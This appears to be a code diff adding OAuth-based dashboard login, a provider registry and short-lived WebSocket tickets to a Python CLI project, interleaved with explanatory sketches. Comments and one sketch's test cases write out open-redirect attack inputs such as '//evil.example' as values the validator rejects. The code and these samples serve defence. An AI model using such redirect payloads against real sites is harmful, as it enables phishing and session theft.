# HERMES_DASHBOARD_PUBLIC_URL / dashboard.public_url
# ---------------------------------------------------------------------------
def _normalise_public_url(raw: Optional[str]) -> str:
"""Normalise a ``dashboard.public_url`` value.
Returns the cleaned URL (scheme://netloc[/path], trailing slash
removed) on success, or ``""`` when the value is empty, malformed,
or contains characters that suggest header injection. The caller
must treat ``""`` as "fall back to request reconstruction", never
as "the user explicitly chose no public URL", because the two are
indistinguishable from an empty env var.
"""
if not raw:
return ""
url = raw.strip()
if not url:
return ""
# Reject control / quote / whitespace characters before trying to
# parse — urlparse is permissive enough to accept some hostile
# values (e.g. embedded newlines) and we want a hard "no" rather
# than a soft "maybe".
if any(c in url for c in _REJECT_CHARS):
return ""
try:
parsed = urllib.parse.urlparse(url)
except ValueError:
return ""
if parsed.scheme not in {"http", "https"}:
return ""
if not parsed.netloc:
return ""
# Strip trailing slashes so callers can append paths without
# producing ``//`` double-slashes.
return url.rstrip("/")
def _load_dashboard_section() -> dict:
"""Return the ``dashboard`` block from ``config.yaml`` if it exists
and is a dict; otherwise an empty dict.
Robust to (a) load_config() raising (malformed YAML, IO error,
config.yaml absent), and (b) ``dashboard`` being absent or non-dict.
Both shapes fall through to ``{}`` so the caller can rely on
``.get(...)`` access.
"""
try:
from hermes_cli.config import load_config
except Exception:
return {}
try:
cfg = load_config()
except Exception as exc: # noqa: BLE001 — broad catch is intentional
_log.debug(
"dashboard-auth.prefix: load_config() raised %s; "
"falling back to env-only configuration",
exc,
)
return {}
section = cfg.get("dashboard") if isinstance(cfg, dict) else None
return section if isinstance(section, dict) else {}
def resolve_public_url() -> str:
"""Resolve the operator-declared dashboard public URL.
Precedence (mirrors ``dashboard.oauth.client_id``):
1. ``HERMES_DASHBOARD_PUBLIC_URL`` env var (when non-empty after
strip; empty values are treated as unset so a
provisioned-but-not-populated Fly secret can't shadow a valid
config.yaml entry).
2. ``dashboard.public_url`` in ``config.yaml``.
3. Empty string, which signals "no override, reconstruct from request"
to the caller.
Each candidate value is run through :func:`_normalise_public_url`.
A malformed env var falls through to the config.yaml entry; a
malformed config entry falls through to ``""``. This means a typo
in one surface doesn't prevent the other from working.
"""
env_raw = os.environ.get("HERMES_DASHBOARD_PUBLIC_URL", "")
env_clean = _normalise_public_url(env_raw)
if env_clean:
return env_clean
cfg_raw = _load_dashboard_section().get("public_url", "")
return _normalise_public_url(str(cfg_raw))
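The precedence described in ``resolve_public_url`` can be exercised with plain dictionaries in place of the process environment and ``config.yaml``. This is a minimal sketch: ``clean`` and ``pick_public_url`` are hypothetical names, and the hostnames are placeholders.

```python
from typing import Mapping
from urllib.parse import urlparse

_REJECT = frozenset('"\'<> \n\r\t')


def clean(raw: str) -> str:
    """Simplified restatement of the public-URL normalisation above."""
    url = (raw or "").strip()
    if not url or any(c in url for c in _REJECT):
        return ""
    try:
        parsed = urlparse(url)
    except ValueError:
        return ""
    if parsed.scheme not in {"http", "https"} or not parsed.netloc:
        return ""
    return url.rstrip("/")


def pick_public_url(env: Mapping[str, str], dashboard_cfg: Mapping[str, object]) -> str:
    # The env var wins when it normalises to something usable...
    env_clean = clean(env.get("HERMES_DASHBOARD_PUBLIC_URL", ""))
    if env_clean:
        return env_clean
    # ...otherwise fall through to the config entry (or "" if that fails too).
    return clean(str(dashboard_cfg.get("public_url", "")))


cfg = {"public_url": "https://cfg.example/hermes/"}
print(pick_public_url({"HERMES_DASHBOARD_PUBLIC_URL": "https://env.example"}, cfg))
print(pick_public_url({"HERMES_DASHBOARD_PUBLIC_URL": "   "}, cfg))
print(pick_public_url({"HERMES_DASHBOARD_PUBLIC_URL": "ftp://bad"}, cfg))
print(repr(pick_public_url({}, {})))
```

The second and third calls show the fall-through: a blank or malformed env value does not shadow the config entry.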
@@ -0,0 +1,58 @@
"""Module-level registry for DashboardAuthProvider instances.
Plugins call ``register_provider`` via the plugin context hook at startup.
The auth gate middleware iterates ``list_providers()`` and uses
``get_provider`` to dispatch on the session's ``provider`` field.
"""
from __future__ import annotations
import logging
import threading
from typing import List, Optional
from hermes_cli.dashboard_auth.base import (
DashboardAuthProvider,
assert_protocol_compliance,
)
_log = logging.getLogger(__name__)
_lock = threading.Lock()
_providers: dict[str, DashboardAuthProvider] = {}
def register_provider(provider: DashboardAuthProvider) -> None:
"""Register a provider.
Raises:
TypeError: on protocol violation.
ValueError: if a provider with the same name is already registered.
"""
assert_protocol_compliance(type(provider))
with _lock:
if provider.name in _providers:
raise ValueError(
f"dashboard-auth provider already registered: {provider.name!r}"
)
_providers[provider.name] = provider
_log.info(
"dashboard-auth: registered provider %r (%s)",
provider.name, provider.display_name,
)
def get_provider(name: str) -> Optional[DashboardAuthProvider]:
"""Return the registered provider for ``name``, or None if unknown."""
with _lock:
return _providers.get(name)
def list_providers() -> List[DashboardAuthProvider]:
"""All registered providers, in registration order."""
with _lock:
return list(_providers.values())
def clear_providers() -> None:
"""Test-only: drop all registrations."""
with _lock:
_providers.clear()
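The registry's two guarantees (duplicate names are rejected, listing preserves registration order) can be checked with a stand-in. The sketch below does not import the real module; ``StubProvider``, ``register`` and ``list_all`` are hypothetical names, and the real ``DashboardAuthProvider`` protocol has more members than the two attributes used here.

```python
from __future__ import annotations

import threading
from dataclasses import dataclass


@dataclass(frozen=True)
class StubProvider:
    """Hypothetical stand-in carrying only the attributes the registry reads."""
    name: str
    display_name: str


_lock = threading.Lock()
_providers: dict[str, StubProvider] = {}


def register(provider: StubProvider) -> None:
    with _lock:
        if provider.name in _providers:
            raise ValueError(f"already registered: {provider.name!r}")
        _providers[provider.name] = provider


def list_all() -> list[StubProvider]:
    # Copy under the lock so callers can iterate without holding it.
    with _lock:
        return list(_providers.values())


register(StubProvider("nous", "Nous Research"))
register(StubProvider("github", "GitHub"))
try:
    register(StubProvider("nous", "Duplicate"))
except ValueError as exc:
    print("rejected:", exc)
print([p.name for p in list_all()])
```

Ordering falls out of ``dict`` insertion order, which is why the login page renders buttons in the order plugins registered.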
@@ -0,0 +1,456 @@
"""HTTP routes for the dashboard-auth OAuth round trip.
Mounted at root (no prefix) by ``web_server.py``. The router does not
auto-gate; gating is performed by ``gated_auth_middleware``, which
allowlists everything under ``/auth/*`` and ``/api/auth/providers``.
The routes:
GET  /login                      server-rendered login page
GET  /auth/login?provider=N      302 to IDP, sets PKCE cookie
GET  /auth/callback?code,state   completes login, sets session cookies
POST /auth/logout                clears cookies, best-effort revoke
GET  /api/auth/providers         list registered providers (login bootstrap)
GET  /api/auth/me                current Session as JSON (auth-required)
"""
from __future__ import annotations
import logging
import time
from typing import Any
from fastapi import APIRouter, HTTPException, Request
from fastapi.responses import HTMLResponse, JSONResponse, RedirectResponse
from hermes_cli.dashboard_auth import (
get_provider,
list_providers,
)
from hermes_cli.dashboard_auth.audit import AuditEvent, audit_log
from hermes_cli.dashboard_auth.base import (
InvalidCodeError,
ProviderError,
)
from hermes_cli.dashboard_auth.cookies import (
clear_pkce_cookie,
clear_session_cookies,
detect_https,
read_pkce_cookie,
read_session_cookies,
set_pkce_cookie,
set_session_cookies,
)
from hermes_cli.dashboard_auth.login_page import render_login_html
_log = logging.getLogger(__name__)
router = APIRouter()
def _redirect_uri(request: Request) -> str:
"""Reconstruct the absolute callback URL the IDP redirects back to.
Three resolution tiers:
1. ``HERMES_DASHBOARD_PUBLIC_URL`` env var or
``dashboard.public_url`` in config.yaml: when set, this is
the complete authority (scheme + host + optional path prefix)
and we append ``/auth/callback`` verbatim. ``X-Forwarded-Prefix``
is IGNORED on this code path because the operator has declared
the public URL; we no longer need to guess from proxy headers,
and stacking the prefix on top would double-prefix the common
case where the prefix is already baked into ``public_url``.
Relief valve for deploys behind reverse proxies whose forwarded
headers aren't reliable.
2. ``X-Forwarded-Prefix: /hermes`` (Mission Control deploys): we
prepend the prefix to the path FastAPI's ``url_for`` produces
(it doesn't natively honour this header; it isn't part of the
Starlette/uvicorn proxy_headers set).
3. Bare ``request.url_for("auth_callback")``: under uvicorn's
``proxy_headers=True`` this picks up the public https URL from
``X-Forwarded-Host`` plus ``X-Forwarded-Proto``. Fly.io's
default path.
"""
from urllib.parse import urlparse, urlunparse
from hermes_cli.dashboard_auth.prefix import (
prefix_from_request,
resolve_public_url,
)
# Tier 1: operator-declared public URL.
public_url = resolve_public_url()
if public_url:
# ``public_url`` is the complete authority (possibly with a
# path prefix already baked in). Append the auth callback path
# verbatim. ``resolve_public_url`` already stripped any trailing
# slash so we don't produce ``//auth/callback`` double-slashes.
return f"{public_url}/auth/callback"
# Tier 2 + 3: reconstruct from the request URL, optionally with
# X-Forwarded-Prefix layered on top of the path.
base = str(request.url_for("auth_callback"))
prefix = prefix_from_request(request)
if not prefix:
return base
parsed = urlparse(base)
return urlunparse(parsed._replace(path=f"{prefix}{parsed.path}"))
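The three tiers reduce to a small pure function once the request is factored out. The sketch below is an illustration under that assumption: ``callback_url`` is a hypothetical name, ``base`` stands in for whatever ``request.url_for("auth_callback")`` would return, and the host is a placeholder.

```python
from urllib.parse import urlparse, urlunparse


def callback_url(base: str, *, public_url: str = "", prefix: str = "") -> str:
    # Tier 1: a declared public URL is used as-is; the prefix is ignored
    # because it is normally already part of public_url.
    if public_url:
        return f"{public_url}/auth/callback"
    # Tier 3: no prefix header, so the reconstructed URL is already right.
    if not prefix:
        return base
    # Tier 2: splice the forwarded prefix in front of the path only.
    parsed = urlparse(base)
    return urlunparse(parsed._replace(path=f"{prefix}{parsed.path}"))


base = "https://mc.example/auth/callback"
print(callback_url(base))
print(callback_url(base, prefix="/hermes"))
print(callback_url(base, public_url="https://mc.example/hermes", prefix="/hermes"))
```

The last call shows why tier 1 ignores the header: applying the prefix on top of a ``public_url`` that already contains it would yield ``/hermes/hermes/auth/callback``.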
def _client_ip(request: Request) -> str:
fwd = request.headers.get("x-forwarded-for", "")
if fwd:
return fwd.split(",")[0].strip()
return request.client.host if request.client else ""
def _prefix(request: Request) -> str:
"""Resolve the X-Forwarded-Prefix header for the active request.
Local indirection so the routes pass a consistent value to the
cookie helpers (cookie name + Path attribute) and the gate's
redirect builders (login_url construction). See
``hermes_cli.dashboard_auth.prefix`` for the normalisation rules.
"""
from hermes_cli.dashboard_auth.prefix import prefix_from_request
return prefix_from_request(request)
# ---------------------------------------------------------------------------
# Public: login page (server-rendered HTML, no SPA bundle)
# ---------------------------------------------------------------------------
@router.get("/login", name="login_page")
async def login_page(request: Request) -> HTMLResponse:
# Read the ``next=`` query the gate's ``_unauth_response`` set on
# the redirect URL. Validate against the same same-origin rules the
# callback applies (defence in depth — the gate already filters,
# but /login is reachable directly too).
next_path = _validate_post_login_target(
request.query_params.get("next", "")
)
return HTMLResponse(
render_login_html(next_path=next_path),
headers={"Cache-Control": "no-store, no-cache, must-revalidate"},
)
# ---------------------------------------------------------------------------
# Public: provider list for the login-page bootstrap
# ---------------------------------------------------------------------------
@router.get("/api/auth/providers", name="auth_providers")
async def api_auth_providers() -> Any:
providers = list_providers()
if not providers:
# Q13: fail-closed when zero providers are registered.
return JSONResponse(
{"detail": "no auth providers registered"},
status_code=503,
)
return {
"providers": [
{"name": p.name, "display_name": p.display_name}
for p in providers
],
}
# ---------------------------------------------------------------------------
# Public: OAuth round trip
# ---------------------------------------------------------------------------
@router.get("/auth/login", name="auth_login")
async def auth_login(request: Request, provider: str, next: str = ""):
p = get_provider(provider)
if p is None:
raise HTTPException(
status_code=404,
detail=f"Unknown provider: {provider!r}",
)
try:
ls = p.start_login(redirect_uri=_redirect_uri(request))
except ProviderError as e:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider,
reason="provider_unreachable",
ip=_client_ip(request),
)
raise HTTPException(
status_code=503,
detail=f"Provider unreachable: {e}",
)
audit_log(
AuditEvent.LOGIN_START,
provider=provider,
ip=_client_ip(request),
)
resp = RedirectResponse(url=ls.redirect_url, status_code=302)
# Pack the provider name into the PKCE cookie so the callback can
# find it without a separate cookie. Provider may or may not have
# already included a ``provider=`` segment.
pkce = ls.cookie_payload.get("hermes_session_pkce", "")
if "provider=" not in pkce:
pkce = f"provider={provider};{pkce}" if pkce else f"provider={provider}"
# Carry ``next=`` through the round trip in the PKCE cookie. Real
# IDPs only echo back ``code`` + ``state`` on the callback URL, so
# query-string transport would lose the value — the cookie is the
# only server-controlled channel that survives. Validate before we
# store it so an attacker who reaches /auth/login directly with
# ``next=//evil.example`` can't poison the cookie.
safe_next = _validate_post_login_target(next)
if safe_next:
from urllib.parse import quote
pkce = f"{pkce};next={quote(safe_next, safe='')}"
set_pkce_cookie(
resp, payload=pkce, use_https=detect_https(request),
prefix=_prefix(request),
)
return resp
@router.get("/auth/callback", name="auth_callback")
async def auth_callback(
request: Request,
code: str = "",
state: str = "",
error: str = "",
error_description: str = "",
):
pkce_raw = read_pkce_cookie(request)
if not pkce_raw:
audit_log(
AuditEvent.LOGIN_FAILURE,
reason="missing_pkce_cookie",
ip=_client_ip(request),
)
raise HTTPException(
status_code=400,
detail="Missing PKCE state cookie",
)
# Parse ``provider=...;state=...;verifier=...;next=...`` — the
# ``next`` segment is optional (only present when /auth/login was
# given a next= query). All keys live in the same flat namespace;
# ``next`` carries a URL-encoded path so it never contains ``;``.
parts = dict(
seg.split("=", 1) for seg in pkce_raw.split(";") if "=" in seg
)
provider_name = parts.get("provider", "")
expected_state = parts.get("state", "")
verifier = parts.get("verifier", "")
# Read next= from the cookie ONLY. The IDP doesn't echo next= back
# on the callback URL (it only carries ``code`` + ``state``), so any
# next= query parameter on the callback URL is attacker-controlled
# and MUST be ignored.
next_from_cookie = parts.get("next", "")
p = get_provider(provider_name)
if p is None:
raise HTTPException(
status_code=400,
detail=f"Unknown provider in cookie: {provider_name!r}",
)
if error:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="idp_error",
error=error,
ip=_client_ip(request),
)
raise HTTPException(
status_code=400,
detail=f"OAuth error from provider: {error} ({error_description})",
)
if not state or state != expected_state:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="state_mismatch",
ip=_client_ip(request),
)
raise HTTPException(
status_code=400,
detail="OAuth state mismatch (CSRF check failed)",
)
try:
session = p.complete_login(
code=code,
state=state,
code_verifier=verifier,
redirect_uri=_redirect_uri(request),
)
except InvalidCodeError as e:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="invalid_code",
ip=_client_ip(request),
)
raise HTTPException(status_code=400, detail=f"Invalid code: {e}")
except ProviderError as e:
audit_log(
AuditEvent.LOGIN_FAILURE,
provider=provider_name,
reason="provider_unreachable",
ip=_client_ip(request),
)
raise HTTPException(
status_code=503,
detail=f"Provider unreachable: {e}",
)
audit_log(
AuditEvent.LOGIN_SUCCESS,
provider=provider_name,
user_id=session.user_id,
email=session.email,
org_id=session.org_id,
ip=_client_ip(request),
)
expires_in = max(60, session.expires_at - int(time.time()))
# Honour the ``next=`` value the gate's _unauth_response set in the
# /login redirect URL and that /auth/login persisted into the PKCE
# cookie. We re-validate against the same-origin rules here — the
# cookie is server-set so this is defence in depth, but a regression
# that lets attacker-controlled bytes into the cookie would otherwise
# produce an open redirect.
landing = _validate_post_login_target(next_from_cookie) or "/"
resp = RedirectResponse(url=landing, status_code=302)
set_session_cookies(
resp,
access_token=session.access_token,
refresh_token=session.refresh_token,
access_token_expires_in=expires_in,
use_https=detect_https(request),
prefix=_prefix(request),
)
clear_pkce_cookie(resp, prefix=_prefix(request))
return resp
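The flat ``key=value;key=value`` PKCE cookie payload parsed in the callback can be round-tripped in a few lines. This sketch assumes the segment layout named in the comment above (``provider``, ``state``, ``verifier``, optional ``next``); ``pack_pkce`` and ``parse_pkce`` are hypothetical helper names and the values are made up.

```python
from urllib.parse import quote, unquote


def pack_pkce(provider: str, state: str, verifier: str, next_path: str = "") -> str:
    payload = f"provider={provider};state={state};verifier={verifier}"
    if next_path:
        # Percent-encoding guarantees the value contains no ";" separator.
        payload += f";next={quote(next_path, safe='')}"
    return payload


def parse_pkce(raw: str) -> dict:
    # Split on the first "=" only, so values may themselves contain "=".
    return dict(seg.split("=", 1) for seg in raw.split(";") if "=" in seg)


raw = pack_pkce("nous", "abc123", "verif-xyz", "/sessions?tab=a;b")
parts = parse_pkce(raw)
print(raw)
print(parts["provider"], parts["state"], unquote(parts["next"]))
```

Note that the example ``next`` value contains a literal ``;``; it survives only because it is percent-encoded before being appended.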
def _validate_post_login_target(raw: str) -> str:
"""Return ``raw`` if it's a safe same-origin path, else empty string.
The ``next`` query param survives a full OAuth round trip: the gate
encodes it into the /login redirect, the login page emits it back into
/auth/login, and /auth/login stores it in the PKCE cookie for the
callback to read. We re-validate at every hop because /login and
/auth/login are reachable directly, so an attacker could craft a URL
carrying their own ``next=https://evil.example``.
"""
if not raw:
return ""
from urllib.parse import unquote
decoded = unquote(raw)
if not decoded.startswith("/") or decoded.startswith("//"):
return ""
# Don't loop back to login pages or auth flow.
if any(
decoded == p or decoded.startswith(p)
for p in ("/login", "/auth/", "/api/auth/")
):
return ""
return decoded
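A few concrete inputs make the open-redirect checks easier to review. The block below restates the validator as a standalone function (``validate_target`` is a hypothetical name) and runs it over made-up cases, including a percent-encoded protocol-relative URL.

```python
from urllib.parse import quote, unquote

_AUTH_PREFIXES = ("/login", "/auth/", "/api/auth/")


def validate_target(raw: str) -> str:
    """Standalone restatement of the checks above."""
    if not raw:
        return ""
    decoded = unquote(raw)
    # Must be a same-origin relative path; "//host" is protocol-relative.
    if not decoded.startswith("/") or decoded.startswith("//"):
        return ""
    if any(decoded == p or decoded.startswith(p) for p in _AUTH_PREFIXES):
        return ""
    return decoded


cases = {
    quote("/sessions?page=2", safe=""): "/sessions?page=2",
    "https://evil.example": "",
    "%2F%2Fevil.example": "",  # decodes to //evil.example
    "/auth/login": "",         # would loop back into the auth flow
}
for raw, expected in cases.items():
    assert validate_target(raw) == expected
    print(repr(raw), "->", repr(validate_target(raw)))
```

Decoding before checking is what catches the third case: the encoded form does not start with ``//``, but the decoded form does.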
@router.post("/auth/logout", name="auth_logout")
async def auth_logout(request: Request):
_at, rt = read_session_cookies(request)
if rt:
# Best-effort revoke. Try every provider so a session minted by
# any registered provider is revoked correctly. Failures are
# logged but never raised.
for provider in list_providers():
try:
provider.revoke_session(refresh_token=rt)
except Exception as e: # noqa: BLE001 — best-effort
_log.warning(
"dashboard-auth: revoke on %r failed: %s",
provider.name, e,
)
sess = getattr(request.state, "session", None)
audit_log(
AuditEvent.LOGOUT,
provider=(sess.provider if sess else "unknown"),
user_id=(sess.user_id if sess else ""),
ip=_client_ip(request),
)
prefix = _prefix(request)
resp = RedirectResponse(url=f"{prefix}/login", status_code=302)
clear_session_cookies(resp, prefix=prefix)
clear_pkce_cookie(resp, prefix=prefix)
return resp
# ---------------------------------------------------------------------------
# Auth-required: identity probe for the SPA
# ---------------------------------------------------------------------------
@router.get("/api/auth/me", name="auth_me")
async def api_auth_me(request: Request):
"""Return the verified session as JSON. Auth-required (gate enforces)."""
sess = getattr(request.state, "session", None)
if sess is None:
raise HTTPException(status_code=401, detail="Unauthorized")
return {
"user_id": sess.user_id,
"email": sess.email,
"display_name": sess.display_name,
"org_id": sess.org_id,
"provider": sess.provider,
"expires_at": sess.expires_at,
}
# ---------------------------------------------------------------------------
# Auth-required: WS upgrade ticket (Phase 5)
# ---------------------------------------------------------------------------
@router.post("/api/auth/ws-ticket", name="auth_ws_ticket")
async def api_auth_ws_ticket(request: Request):
"""Mint a short-lived single-use ticket for the authenticated session.
Browsers cannot set ``Authorization`` on a WebSocket upgrade, so in
gated mode the SPA POSTs this endpoint to get a ``?ticket=`` value to
append to ``/api/pty``, ``/api/ws``, ``/api/pub``, or ``/api/events``.
The ticket has a 30-second TTL and is single-use. Calling this endpoint
multiple times in quick succession (e.g. one ticket per WS) is the
expected pattern.
"""
sess = getattr(request.state, "session", None)
if sess is None:
# Middleware should already have rejected, but check defensively.
raise HTTPException(status_code=401, detail="Unauthorized")
# Import here so the routes module stays usable in test contexts that
# don't load the ticket store.
from hermes_cli.dashboard_auth.ws_tickets import TTL_SECONDS, mint_ticket
ticket = mint_ticket(user_id=sess.user_id, provider=sess.provider)
audit_log(
AuditEvent.WS_TICKET_MINTED,
provider=sess.provider,
user_id=sess.user_id,
ip=_client_ip(request),
)
return {"ticket": ticket, "ttl_seconds": TTL_SECONDS}
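The ticket semantics the endpoint promises (30-second TTL, single use) can be sketched as a small in-memory store. This is an assumption-laden illustration, not the module's code: ``mint``, ``consume`` and ``TicketError`` are hypothetical names, the clock is passed in explicitly to keep the example deterministic, and treating a ticket as expired exactly at its expiry second is a choice made here.

```python
import secrets
import threading

TTL_SECONDS = 30
_lock = threading.Lock()
_store = {}  # ticket -> (expires_at, info)


class TicketError(Exception):
    """Ticket missing, expired, or already consumed."""


def mint(user_id: str, *, now: int) -> str:
    ticket = secrets.token_urlsafe(32)  # 32 random bytes, 43 URL-safe chars
    with _lock:
        _store[ticket] = (now + TTL_SECONDS, {"user_id": user_id})
    return ticket


def consume(ticket: str, *, now: int) -> dict:
    with _lock:
        # pop() makes the ticket single-use even if it turns out expired.
        entry = _store.pop(ticket, None)
    if entry is None:
        raise TicketError("unknown ticket")
    expires_at, info = entry
    if now >= expires_at:
        raise TicketError("expired ticket")
    return info


t = mint("u1", now=1000)
print(len(t), consume(t, now=1010))
try:
    consume(t, now=1011)
except TicketError as exc:
    print("second use rejected:", exc)
```

Minting one ticket per WebSocket, immediately before opening it, keeps the 30-second window comfortable while leaving a leaked ticket little time to be replayed.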
@@ -0,0 +1,87 @@
"""Short-lived single-use tickets for WS-upgrade auth in gated mode.
Browsers cannot set ``Authorization`` on a WebSocket upgrade. In loopback
mode the legacy ``?token=<_SESSION_TOKEN>`` query param works because the
token is injected into the SPA bundle. In gated mode there is no injected
token, so the SPA gets a fresh ticket via the authenticated REST endpoint
``POST /api/auth/ws-ticket`` and passes that as ``?ticket=`` on the
WS upgrade.
Tickets are single-use, TTL = 30 seconds. In-memory; the dashboard is a
single process so no distributed coordination is needed. The module
exposes a small functional API rather than a class so tests can patch
``time.time`` cleanly.
"""
from __future__ import annotations
import secrets
import threading
import time
from typing import Any, Dict, Tuple
#: Time-to-live for newly-minted tickets in seconds. 30 s is long enough
#: that the SPA can call ``getWsTicket()`` and immediately open the WS,
#: short enough that a leaked ticket is uninteresting.
TTL_SECONDS = 30
_lock = threading.Lock()
_tickets: Dict[str, Tuple[int, Dict[str, Any]]] = {} # ticket -> (expires_at, info)
class TicketInvalid(Exception):
"""Ticket missing, expired, or already consumed."""
def mint_ticket(*, user_id: str, provider: str) -> str:
"""Generate a one-shot ticket bound to this user identity.
The returned token is base64url: 43 characters encoding 32 random bytes
of entropy. The store returns the ``info`` dict to the caller on consume
so the WS handler can carry the identity forward into its session log.
"""
ticket = secrets.token_urlsafe(32)
info = {
"user_id": user_id,
"provider": provider,
"minted_at": int(time.time()),
}
with _lock:
_tickets[ticket] = (int(time.time()) + TTL_SECONDS, info)
_gc_expired_locked()
return ticket
def consume_ticket(ticket: str) -> Dict[str, Any]:
"""Validate and consume. Raises :class:`TicketInvalid` on missing/expired/used.
Single-use semantics: a successful consume immediately removes the
ticket from the store, so a second call with the same value raises
``TicketInvalid("unknown ticket: …")``.
"""
now = int(time.time())
with _lock:
entry = _tickets.pop(ticket, None)
if entry is None:
# Truncate ticket value in the error so misuse never logs the
# secret in full.
truncated = (ticket[:8] + "…") if ticket else "<empty>"
raise TicketInvalid(f"unknown ticket: {truncated}")
expires_at, info = entry
if expires_at < now:
raise TicketInvalid("expired")
return info
def _gc_expired_locked() -> None:
"""Drop expired tickets. Caller must hold ``_lock``."""
now = int(time.time())
expired = [t for t, (exp, _) in _tickets.items() if exp < now]
for t in expired:
_tickets.pop(t, None)
def _reset_for_tests() -> None:
"""Test-only: drop all tickets."""
with _lock:
_tickets.clear()
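The single-use and expiry semantics above can be exercised in isolation. What follows is a minimal sketch, not the module itself: `TicketStore`, its `clock` parameter, and `ticket_from_url` are hypothetical names introduced for illustration. Only the 30-second TTL, `secrets.token_urlsafe(32)`, the pop-on-consume pattern, and the `?ticket=` query parameter come from the diff.

```python
import secrets
import threading
import time
from typing import Any, Callable, Dict, Tuple
from urllib.parse import parse_qs, urlparse

TTL_SECONDS = 30  # same TTL as the diff


class TicketInvalid(Exception):
    """Ticket missing, expired, or already consumed."""


class TicketStore:
    """Hypothetical in-memory store with an injectable clock for tests."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        self._lock = threading.Lock()
        self._tickets: Dict[str, Tuple[int, Dict[str, Any]]] = {}

    def mint(self, user_id: str, provider: str) -> str:
        # 32 random bytes encode to 43 URL-safe characters.
        ticket = secrets.token_urlsafe(32)
        now = int(self._clock())
        info = {"user_id": user_id, "provider": provider, "minted_at": now}
        with self._lock:
            self._tickets[ticket] = (now + TTL_SECONDS, info)
        return ticket

    def consume(self, ticket: str) -> Dict[str, Any]:
        now = int(self._clock())
        with self._lock:
            # pop() removes the entry whether or not it is still valid,
            # which is what makes the ticket single-use.
            entry = self._tickets.pop(ticket, None)
        if entry is None:
            raise TicketInvalid("unknown ticket")
        expires_at, info = entry
        if expires_at < now:
            raise TicketInvalid("expired")
        return info


def ticket_from_url(url: str) -> str:
    """Extract the ``?ticket=`` value from a WS upgrade URL (empty if absent)."""
    values = parse_qs(urlparse(url).query).get("ticket", [])
    return values[0] if values else ""
```

Injecting the clock through the constructor is one alternative to patching `time.time`; the functional API in the diff reaches the same goal by keeping all time reads as plain `time.time()` calls.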
+1 -67
@@ -25,7 +25,6 @@ load_hermes_dotenv(hermes_home=_env_path.parent, project_env=PROJECT_ROOT / ".en
from hermes_cli.colors import Colors, color
from hermes_cli.models import _HERMES_USER_AGENT
from hermes_cli.vercel_auth import describe_vercel_auth
from hermes_constants import OPENROUTER_MODELS_URL
from utils import base_url_host_matches
@@ -49,7 +48,6 @@ _PROVIDER_ENV_HINTS = (
"DEEPSEEK_API_KEY",
"DASHSCOPE_API_KEY",
"HF_TOKEN",
"AI_GATEWAY_API_KEY",
"OPENCODE_ZEN_API_KEY",
"OPENCODE_GO_API_KEY",
"XIAOMI_API_KEY",
@@ -324,7 +322,6 @@ def _build_apikey_providers_list() -> list:
("MiniMax", ("MINIMAX_API_KEY",), "https://api.minimax.io/v1/models", "MINIMAX_BASE_URL", True),
# MiniMax CN: /v1 endpoint does NOT support /models (returns 404).
("MiniMax (China)", ("MINIMAX_CN_API_KEY",), "https://api.minimaxi.com/v1/models", "MINIMAX_CN_BASE_URL", False),
("Vercel AI Gateway", ("AI_GATEWAY_API_KEY",), "https://ai-gateway.vercel.sh/v1/models", "AI_GATEWAY_BASE_URL", True),
("Kilo Code", ("KILOCODE_API_KEY",), "https://api.kilo.ai/api/gateway/models", "KILOCODE_BASE_URL", True),
("OpenCode Zen", ("OPENCODE_ZEN_API_KEY",), "https://opencode.ai/zen/v1/models", "OPENCODE_ZEN_BASE_URL", True),
# OpenCode Go has no shared /models endpoint; skip the health check.
@@ -340,7 +337,7 @@ def _build_apikey_providers_list() -> list:
"Arcee AI": "arcee", "GMI Cloud": "gmi", "DeepSeek": "deepseek",
"Hugging Face": "huggingface", "NVIDIA NIM": "nvidia",
"Alibaba/DashScope": "alibaba", "MiniMax": "minimax",
"MiniMax (China)": "minimax-cn", "Vercel AI Gateway": "ai-gateway",
"MiniMax (China)": "minimax-cn",
"Kilo Code": "kilocode", "OpenCode Zen": "opencode-zen",
"OpenCode Go": "opencode-go",
}
@@ -690,7 +687,6 @@ def run_doctor(args):
"openrouter",
"custom",
"auto",
"ai-gateway",
"kilocode",
"opencode-zen",
"huggingface",
@@ -1262,68 +1258,6 @@ def run_doctor(args):
issues,
)
# Vercel Sandbox (if using vercel_sandbox backend)
if terminal_env == "vercel_sandbox":
runtime = os.getenv("TERMINAL_VERCEL_RUNTIME", "node24").strip() or "node24"
from tools.terminal_tool import _SUPPORTED_VERCEL_RUNTIMES
if runtime in _SUPPORTED_VERCEL_RUNTIMES:
check_ok("Vercel runtime", f"({runtime})")
else:
supported = ", ".join(_SUPPORTED_VERCEL_RUNTIMES)
_fail_and_issue(
"Vercel runtime unsupported",
f"({runtime}; use {supported})",
f"Set TERMINAL_VERCEL_RUNTIME to one of: {supported}",
issues,
)
disk = os.getenv("TERMINAL_CONTAINER_DISK", "51200").strip()
if disk in {"", "0", "51200"}:
check_ok("Vercel disk setting", "(uses platform default)")
else:
_fail_and_issue(
"Vercel custom disk unsupported",
"(reset terminal.container_disk to 51200)",
"Vercel Sandbox does not support custom container_disk; use the shared default 51200",
issues,
)
if importlib.util.find_spec("vercel") is not None:
check_ok("vercel SDK", "(installed)")
else:
_fail_and_issue(
"vercel SDK not installed",
"(pip install 'hermes-agent[vercel]')",
"Install the Vercel optional dependency: pip install 'hermes-agent[vercel]'",
issues,
)
auth_status = describe_vercel_auth()
if auth_status.ok:
check_ok("Vercel auth", f"({auth_status.label})")
elif auth_status.label.startswith("partial"):
_fail_and_issue(
"Vercel auth incomplete",
f"({auth_status.label})",
"Set VERCEL_TOKEN, VERCEL_PROJECT_ID, and VERCEL_TEAM_ID together",
issues,
)
else:
_fail_and_issue(
"Vercel auth not configured",
f"({auth_status.label})",
"Configure Vercel Sandbox auth with VERCEL_TOKEN, VERCEL_PROJECT_ID, and VERCEL_TEAM_ID",
issues,
)
for line in auth_status.detail_lines:
check_info(f"Vercel auth {line}")
persistent = os.getenv("TERMINAL_CONTAINER_PERSISTENT", "true").lower() in {"1", "true", "yes", "on"}
if persistent:
check_info("Vercel persistence: snapshot filesystem only; live processes do not survive sandbox recreation")
else:
check_info("Vercel persistence: ephemeral filesystem")
# Node.js + agent-browser (for browser automation tools)
if _safe_which("node"):
check_ok("Node.js")
+24 -3
